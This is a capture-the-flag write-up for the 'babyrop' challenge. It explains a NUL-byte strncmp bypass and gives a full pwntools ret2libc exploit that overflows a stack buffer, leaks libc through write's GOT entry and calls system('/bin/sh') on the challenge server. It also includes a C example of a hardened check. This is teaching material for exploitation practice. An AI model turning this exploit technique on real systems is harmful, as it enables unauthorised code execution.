  • ogeek babyrop

    Load the binary into IDA.

    It first uses strncmp to compare a random value against our input; a leading \x00 byte lets us skip that strncmp.

    Then the a1 argument of read() is taken from the value that follows the \x00 we entered.
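    As an added illustration (not code from the original write-up), here is a hypothetical C reconstruction of the check described above next to a hardened form: the weak version takes the compare length from strlen() of the input, so an input starting with a NUL byte makes strncmp() compare zero bytes and report a match, while the hardened version compares a fixed number of bytes with memcmp() and rejects short input. The token length, buffer size and function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define TOKEN_LEN 8      /* assumed length of the random token */
#define BUF_SIZE  0x20   /* assumed size of the input buffer */

/* Weak check (hypothetical reconstruction of the pattern in the write-up):
 * the compare length comes from strlen() of attacker-controlled input, so an
 * input whose first byte is '\0' yields n == 0 and strncmp() returns 0.
 * Returns 1 when the input is accepted. */
int weak_check(const unsigned char *input, size_t in_len,
               const unsigned char *token)
{
    unsigned char buf[BUF_SIZE] = {0};
    if (in_len > BUF_SIZE)
        in_len = BUF_SIZE;
    memcpy(buf, input, in_len);
    size_t n = strlen((const char *)buf);   /* 0 if buf[0] == '\0' */
    return strncmp((const char *)buf, (const char *)token, n) == 0;
}

/* Hardened check: compare exactly TOKEN_LEN bytes with memcmp(), which does
 * not stop at NUL bytes, and refuse input too short to hold a full token. */
int strict_check(const unsigned char *input, size_t in_len,
                 const unsigned char *token)
{
    if (in_len < TOKEN_LEN)
        return 0;
    return memcmp(input, token, TOKEN_LEN) == 0;
}

int main(void)
{
    /* constructed sample values: a token and the "\x00" + "\xff"*7 input used above */
    const unsigned char token[TOKEN_LEN] = {'d','e','a','d','b','e','e','f'};
    const unsigned char input[TOKEN_LEN] = {0x00,0xff,0xff,0xff,0xff,0xff,0xff,0xff};

    printf("weak_check   -> %d\n", weak_check(input, sizeof input, token));   /* 1: accepted */
    printf("strict_check -> %d\n", strict_check(input, sizeof input, token)); /* 0: rejected */
    return 0;
}
```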

    Writing the exploit:

    from pwn import *
    
    sh=remote('node1.buuoj.cn',28560)
    #sh=process('/home/harmonica/Desktop/oppo/rop/babyrop')
    elf=ELF('/home/harmonica/Desktop/oppo/rop/babyrop')
    libc=ELF('/home/harmonica/Desktop/oppo/rop/libc-2.23.so')
    
    bin_sh_off=0x0015902b
    system_off=0x0003a940
    
    write_plt = elf.plt['write']
    write_got = elf.got['write']
    main=0x08048825
    
    # leading NUL skips the strncmp check; the following 0xff byte becomes the read() size
    payload='\x00'+'\xff'*7
    sh.sendline(payload)
    sh.recvuntil('Correct\n')
    
    payload='a'*0xe7+'bbbb'+p32(write_plt)+p32(main)+p32(1)+p32(write_got)
    sh.sendline(payload)
    
    write_addr = u32(sh.recv()[0:4])
    libcbase = write_addr - libc.sym['write']
    log.success("libcbase: "+hex(libcbase))
    
    system_addr = libcbase + system_off
    binsh_addr = libcbase + bin_sh_off
    
    payload='\x00'+'\xff'*7
    sh.sendline(payload)
    sh.recvuntil('Correct\n')
    
    payload='a'*0xe7+'bbbb'+p32(system_addr)+'bbbb'+p32(binsh_addr)
    sh.sendline(payload)
    
    sh.interactive()

    This gives us the flag.

  • Original post: https://www.cnblogs.com/harmonica11/p/11568166.html